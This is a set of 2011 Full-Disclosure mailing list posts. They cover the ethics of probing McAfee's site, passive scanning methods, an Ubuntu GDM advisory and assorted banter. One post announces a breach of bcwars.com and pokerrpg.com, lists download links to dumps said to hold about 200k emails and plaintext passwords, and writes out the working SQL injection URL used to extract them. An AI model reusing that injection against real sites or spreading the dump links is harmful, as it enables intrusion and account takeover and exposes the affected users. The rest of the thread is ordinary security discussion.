Re: [Full-disclosure] Vulnerabilities in *McAfee.com
Agreed, If you put your site on the open internet, you have to take into account the inherent hostilities that go along with that action. A security firm like Mcafee /knows/ about these vulnerabilities. Guaranteed. If they offer services to make other's sites 'hacker proof', their first order of business should make sure that their infrastructure doesn't have blatantly obvious security holes. I'm not saying that they should catch EVERYTHING, but these are bugs that an automated scanner could easily pick up. I do understand that a large infrastructure like theirs has pages that have been created by people with varying degrees of competence, but that's why they need to do inclusive penetration tests of their own network. At the very least they need to have some mechanism in place to detect (and possibly defer) these sorts of attacks. The way I see it, when a company hides behind legal threats to deter people from finding and reporting bugs, all they're doing is hurting themselves. Look at how Microsoft has turned around. 10 years ago they weren't dealing with people reporting issues in the right way, but they soon came to realize that by listening to the hackers that ARE coming forward with issues, they not only help themselves, but help the community as well. It's a win/win scenario for EVERYONE. You can tell a vast amount about how an infrastructure is run from just a bit of poking. If there are blatant security holes everywhere, then they clearly don't take security seriously. If they filter for SQL injections in javascript, then the dev's have no clue what they're actually trying to do. If you see SQL errors, chances are there are more serious issues to boot. I usually limit my poking to the very basic of basics when I do use a new service, and the more transparent they are (think reddit) the more I trust them. They even have a full subreddit devoted to finding and learning about XSS attacks. One word, awesome. Simply put, in my opinion you can't blame a pen-tester for looking for bugs in a site. The only time it should be considered malicious is when it's used in a malicious way. If I find a XSS in a webform, and I report it along with re-mediation suggestions I feel as though I'm doing the site a favor. It's unfortunate to think that some see this as a criminal activity. Ryan - Original Message - From: Jeffrey Walton noloa...@gmail.com To: Thor (Hammer of God) t...@hammerofgod.com Cc: Ryan Sears rdse...@mtu.edu, full-disclosure full-disclosure@lists.grok.org.uk Sent: Wednesday, March 30, 2011 5:28:59 PM GMT -05:00 US/Canada Eastern Subject: Re: [Full-disclosure] Vulnerabilities in *McAfee.com On Wed, Mar 30, 2011 at 4:36 PM, Thor (Hammer of God) t...@hammerofgod.com wrote: I have that very strip printed and on the wall in my office :) You make several points, but the response that immediately comes to mind is that I actually see a difference between actively scanning content for structural/coding vulnerabilities, and entering data in a search box. I don't know if there is any basis for this legally, but I feel that if you put a box up and I can search for something, then I can put whatever I want in that box. You (the royal you) are basically soliciting people to put data in the box. However, you are not asking anyone to spider your site or run scans against it. If a person or company places a host on the public internet and offers a service, I don't think its reasonable to claim some input is fair and other input is unfair. Perhaps the person or company should not offer public services in the first place. It seems reasonable (to me) that users of the site expect that the site is relatively defect free and secure. A tech-savy user who tests the site through its public interface is simply exercising due diligence before using the services of the site. I personally feel that individuals and companies which want to criminalize 'due diligence' is cowardly at best. I don't want to use the services of such a site; nor do I want to have an account on such a system. Jeff ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] bcwars.com pokerrpg.com hacked 200k Email and Plain text passwords
Nother game, nother haxed db 2 games pokerrpg.com and bcwars.com over 100k users each admin used plaintext passwords how dumb got in thru sql injection in the forum tried helping the admin fix but dumbass Dadfish kept being a dick so this disclosure is because of him bcwars http://bit.ly/hD6bEE http://rapidshare.com/files/455184098/tblUsers-bc.sql.zip http://www.megaupload.com/?d=P4B30IVR http://depositfiles.com/de/files/u7unbc4vk http://hotfile.com/dl/112676282/bcd44f5/tblUsers-bc.sql.zip.html http://www.zshare.net/download/884416713e3e2044/ http://uploading.com/files/3e13f3be/tblUsers-bc.sql.zip/ pokerrpg http://bit.ly/hgCGJx http://rapidshare.com/files/455184096/tblUsers.sql-poker.zip http://www.megaupload.com/?d=T41NF4SV http://depositfiles.com/de/files/8qgnt9gll http://hotfile.com/dl/112676281/bea47ec/tblUsers.sql-poker.zip.html http://www.zshare.net/download/88441668eff79c3a/ http://uploading.com/files/542e651f/tblUsers.sql-poker.zip injection was http://bcwars.com/forum/category/-3' union select concat(id,'',username,':::',password,':::',email) from tblUsers-- - ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] nuclear plants reach software quality levels
On 30 March 2011 21:53, Peter Osterberg j...@vel.nu wrote: Risk would be a lot higher than 10 percent if it was, say, 300 years since the last tsunami Time to go back to school. Or, perhaps you'd like to come play at my casino... ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Vulnerabilities in *McAfee.com
Thanks for all your inputs and discussions. We believe keeping these information as secret is unethical and irresponsible. For those who think/criticize we're unethical /illegal, there is so-called Passive Scanning technique in security testing. Passive scanning (a.k.a Passive Reconnaissance) is basically examining web site work flows and its involved source codes for identifying vulnerabilities without ever attacking the target itself. Contrary to what most of people think, passive scanning allows everyone to audit any web sites without breaking the laws and without alarming firewalls in-front. Basically it starts as: 1. Do Google Hacking and look for potential information leakage. (Most of the tools allow you to add your own GH Dorks). 2. Browse the target web site with a scanner that has passive vulnerability scanning capability - ratproxy, zaproxy, webscarab, fiddler+watcher,/ burp-pro or you name it Also use meta data extraction tools. And look for potential information leakage others 3. Examine all contents of JavaScript decompiled Flash/Silverlight/Java Applet 4. Look for common vulnerable points and mis-uses e.g., for JS files, examine calls like document.URLUnencoded, document.referer, document.location, window.location, location.href,document.URL ...etc Passive scan is just a small subset of assessment realm. Findings are very limited. Our recent disclosure of Plesk open redirect flaw was a result from purely passive scan on a static HTML web site - http://yehg.net/lab/pr0js/advisories/%5Bplesk_7.0-8.2%5D_open_url_redirection ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [USN-1099-1] GDM vulnerability
=== Ubuntu Security Notice USN-1099-1March 30, 2011 gdm vulnerability CVE-2011-0727 === A security issue affects the following Ubuntu releases: Ubuntu 9.10 Ubuntu 10.04 LTS Ubuntu 10.10 This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu. The problem can be corrected by upgrading your system to the following package versions: Ubuntu 9.10: gdm 2.28.1-0ubuntu2.3 Ubuntu 10.04 LTS: gdm 2.30.2.is.2.30.0-0ubuntu5.1 Ubuntu 10.10: gdm 2.30.5-0ubuntu4.1 After a standard system update you need to log out all desktop sessions and restart GDM to make all the necessary changes. Details follow: Sebastian Krahmer discovered that GDM (GNOME Display Manager) did not properly drop privileges when handling the cache directories used to store users' dmrc and face icon files. This could allow a local attacker to change the ownership of arbitrary files, thereby gaining root privileges. Updated packages for Ubuntu 9.10: Source archives: http://security.ubuntu.com/ubuntu/pool/main/g/gdm/gdm_2.28.1-0ubuntu2.3.diff.gz Size/MD5: 769588 17bc09f417591f1913940d47cec9cc35 http://security.ubuntu.com/ubuntu/pool/main/g/gdm/gdm_2.28.1-0ubuntu2.3.dsc Size/MD5: 2168 09c46d7f6f577daa95f47643025ea67c http://security.ubuntu.com/ubuntu/pool/main/g/gdm/gdm_2.28.1.orig.tar.gz Size/MD5: 3661916 b8f101394aa73e4505bad4ed4f0a695c amd64 architecture (Athlon64, Opteron, EM64T Xeon): http://security.ubuntu.com/ubuntu/pool/main/g/gdm/gdm_2.28.1-0ubuntu2.3_amd64.deb Size/MD5: 731002 0e00de9426edb0a1dd9cd74d86251548 i386 architecture (x86 compatible Intel/AMD): http://security.ubuntu.com/ubuntu/pool/main/g/gdm/gdm_2.28.1-0ubuntu2.3_i386.deb Size/MD5: 672338 2e903d2e97356a7a7138f1da9c37c27a armel architecture (ARM Architecture): http://ports.ubuntu.com/pool/main/g/gdm/gdm_2.28.1-0ubuntu2.3_armel.deb Size/MD5: 662246 d6a5a00bc8e37ab1e8ab6faaec9efb42 lpia architecture (Low Power Intel Architecture): http://ports.ubuntu.com/pool/main/g/gdm/gdm_2.28.1-0ubuntu2.3_lpia.deb Size/MD5: 669764 79d09e696d5ff527e86a263944cdf7db powerpc architecture (Apple Macintosh G3/G4/G5): http://ports.ubuntu.com/pool/main/g/gdm/gdm_2.28.1-0ubuntu2.3_powerpc.deb Size/MD5: 697456 eff967e0f0206a299f68e93b76f48d13 sparc architecture (Sun SPARC/UltraSPARC): http://ports.ubuntu.com/pool/main/g/gdm/gdm_2.28.1-0ubuntu2.3_sparc.deb Size/MD5: 681890 23eec0f66ceb24635f86e3e4f3d06ade Updated packages for Ubuntu 10.04 LTS: Source archives: http://security.ubuntu.com/ubuntu/pool/main/g/gdm/gdm_2.30.2.is.2.30.0-0ubuntu5.1.diff.gz Size/MD5: 795064 e314a75da58ead79bd79cac83730c057 http://security.ubuntu.com/ubuntu/pool/main/g/gdm/gdm_2.30.2.is.2.30.0-0ubuntu5.1.dsc Size/MD5: 2223 ea497892c7cc53f86ea3769c78e75962 http://security.ubuntu.com/ubuntu/pool/main/g/gdm/gdm_2.30.2.is.2.30.0.orig.tar.gz Size/MD5: 3725698 583f6e50936f085be268e8543905fb74 amd64 architecture (Athlon64, Opteron, EM64T Xeon): http://security.ubuntu.com/ubuntu/pool/main/g/gdm/gdm_2.30.2.is.2.30.0-0ubuntu5.1_amd64.deb Size/MD5: 798524 1e7b5dee40db568fcafa7d5f8c085c65 i386 architecture (x86 compatible Intel/AMD): http://security.ubuntu.com/ubuntu/pool/main/g/gdm/gdm_2.30.2.is.2.30.0-0ubuntu5.1_i386.deb Size/MD5: 734446 1de50ebe2d1a869a3cc2a4ffb7136de9 armel architecture (ARM Architecture): http://ports.ubuntu.com/pool/main/g/gdm/gdm_2.30.2.is.2.30.0-0ubuntu5.1_armel.deb Size/MD5: 725942 f443a1c4098e116c293ebd9bc153f661 powerpc architecture (Apple Macintosh G3/G4/G5): http://ports.ubuntu.com/pool/main/g/gdm/gdm_2.30.2.is.2.30.0-0ubuntu5.1_powerpc.deb Size/MD5: 760048 30592a26d7d20bc8b70d24543baf6182 sparc architecture (Sun SPARC/UltraSPARC): http://ports.ubuntu.com/pool/main/g/gdm/gdm_2.30.2.is.2.30.0-0ubuntu5.1_sparc.deb Size/MD5: 753996 be562ec975b051a5e6909b394fc5cbc7 Updated packages for Ubuntu 10.10: Source archives: http://security.ubuntu.com/ubuntu/pool/main/g/gdm/gdm_2.30.5-0ubuntu4.1.debian.tar.gz Size/MD5: 112891 a3aee3567a60f658b826668807c4dc6e http://security.ubuntu.com/ubuntu/pool/main/g/gdm/gdm_2.30.5-0ubuntu4.1.dsc Size/MD5: 2187 07a449c1f9b1b1b393b92608f019cfd8 http://security.ubuntu.com/ubuntu/pool/main/g/gdm/gdm_2.30.5.orig.tar.gz Size/MD5: 3784180 9d200a16d6bbab0ac41b93b9dbe6d508 amd64 architecture (Athlon64, Opteron, EM64T Xeon): http://security.ubuntu.com/ubuntu/pool/main/g/gdm/gdm_2.30.5-0ubuntu4.1_amd64.deb Size/MD5: 808788 c88e512ff6c1d9b0afe2553bca3aaa0c i386 architecture (x86 compatible Intel/AMD):
Re: [Full-disclosure] SSL Capable NetCat and more
On 3/27/2011 4:29 PM, Dan Tulovsky wrote: Beside that, scnc is written in pure-Perl, and is easily modifiable by anyone. Such really simple (dumb?) stuff should not be written in low-level languages such as C. You can't be serious... Shirley, he is. Perl is shite. It's a dependency hell, it lacks the logic of C/C++ and is interpreted (as pointed out by others). Any code base can be modifiable by anyone - as long as it is open sourced. Don't get me wrong, I'm not criticizing the product. I think reinventing the wheel in lesser performing methods is great. Just don't disregard C. To be honest, in my code auditing days, it was SO much easier to find flaws in C/C++ than Perl, because Perl is just messy and ugly. Something looks wrong, but it's right. Uggh! But if you need to write something quick for an easy task, by all means, hit the Perl. It's like using Java to write large scale enterprise products. Who the hell? Why? Portability is nice, but performance is better. Java belongs in the small-scale realm of applications. Grumble grumble. Get off my lawn. Back to the lair :-) Randy ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Your email message was blocked
On 3/30/2011 11:31 PM, r...@bellaliant.ca wrote: The following email message was *blocked* by Bell Aliant Content Filtering Device: *From:* ra...@procyonlabs.com *To:*peter.mo...@bellaliant.ca *Subject:* Re: [Full-disclosure] SSL Capable NetCat and more *Message:* B4d93f5990001.0001.0003.mml Because it may contain *unacceptable language*, or *inappropriate material*. Please remove any unacceptable or inappropriate language and resend the message. The blocked email will be automatically deleted after *5 days. * Content Rule: Policy Management (Inbound) : Block Common Mild Profanity r...@bellaliant.ca F**K YOU. Here's a nickel - get yourself a real mail server. Randy -- Disclaimer: By sending an email to ANY of my addresses you are agreeing that: 1. I am, by definition, the intended recipient 2. All information in the email is mine to do with as I see fit 3. I will take the contents as representing the views of your company 4. If your email is an Out of Office reply on a mailing list, I will social engineer your company 5. This notification overrides any disclaimer or statement of confidentiality that may be included on your message Further, you understand that if any of the following conditions are met that you are indeed, a bag of douche: 1. Your message identifies the device you sent it from 2. You messed up the thread by top-posting ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] INSECT Pro 2.5 Release - Web scanner tool
On 3/29/2011 9:13 PM, runlvl wrote: Insecurity Research is happy to announce the release of version 2.5, get it now while is still hot ! Insect Pro 2.5 is a penetration security auditing and testing software solution designed to allow organizations of all sizes mitigate, monitor and manage the latest security threats vulnerabilities. We’re always working to improve Insect Pro and now the users obtain a new feature: A fully automated active web application security reconnaissance tool. Check it out: http://www.youtube.com/watch?v=ifiyHem7fMA We invite you to take a visual tour where you can find screenshots and videos, visit us now at http://www.insecurityresearch.com There is no fixed price to get a copy, you can obtain the full version by making a minimum donation to keep us coding. We are really thankful with the community! I keep getting this error when trying to download: Please enter an amount greater than zero. Can you fix that so I can test out the software. I'm really curious about how much code was lifted from other projects. Nice logo though! Thanks, Randy ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] INSECT Pro 2.5 Release - Web scanner tool
On 3/29/2011 9:13 PM, runlvl wrote: Insecurity Research is happy to announce the release of version 2.5, get it now while is still hot ! snip Oh! And you list the Dept. of Energy as a customer. I used to work there, and still talk to a lot of the security offices for various locations. They've never heard of it. Also, did you get clearance from the DoE's Office of Public Affairs to list them as a customer? They get touchy about that sort of stuff. Randy ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] nuclear plants reach software quality levels
I know what you are trying to say about, but I don't agree with your math if this is a cyclic event that has a 500 year cycle. Risk will increase the closer you get to when it's supposed to happen. There are of course no such thing as cyclic events in a Casino. It's supposed.to be purely random. Unless you play rigged slot machines. -- Skickat från min Android-telefon med K-9 E-post. Ursäkta min fåordighet. Graham Gower graham.go...@gmail.com skrev: On 30 March 2011 21:53, Peter Osterberg j...@vel.nu wrote: Risk would be a lot higher than 10 percent if it was, say, 300 years since the last tsunami Time to go back to school. Or, perhaps you'd like to come play at my casino... ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
